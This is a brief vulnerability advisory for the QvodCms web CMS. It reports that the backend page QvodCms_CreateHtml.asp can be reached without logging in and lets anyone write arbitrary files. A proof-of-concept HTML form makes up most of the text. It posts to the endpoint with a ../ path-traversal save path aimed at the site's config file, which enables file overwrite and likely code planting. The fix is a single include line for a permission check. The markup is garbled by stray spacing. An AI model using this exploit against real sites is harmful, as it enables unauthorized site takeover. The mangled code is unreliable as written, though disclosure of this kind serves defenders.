The backend QvodCms_CreateHtml.asp can be accessed without logging in. The "generate custom template" can generate any file, the file content, and direct to any file on the website.
<Form method = "post" action = "http: // domain name/background/QvodCms_CreateHtml.asp? Action = other "target =" msg1793 "> <input name =" jstype "type =" hidden "value =" Define "> <input name =" jsname "type =" hidden" value = "Define"> Custom template save path: <input name = "cpath" type = "text" value = ".. /wdtasdf.html "style =" color: # FF0000 "> <select name =" Define "onChange =" cpath. value = '.. /'+ this. options [this. selectedIndex]. value; "> <option value = ".. /.. /.. /Cache/QvodCms. config. asp "selected =" selected "> Config </option> </select> <input type = 'submit 'value = 'generate custom template'> </form> <iframe style = "z-index: 1; visibility: inherit; width: 100%; height: 100px; "name =" msg1793 "frameborder =" 0 "scrolling =" yes "> </iframe>
Solution:
Add the permission detection code to the file <! -- # Include file = "QvodCms_Check.asp" -->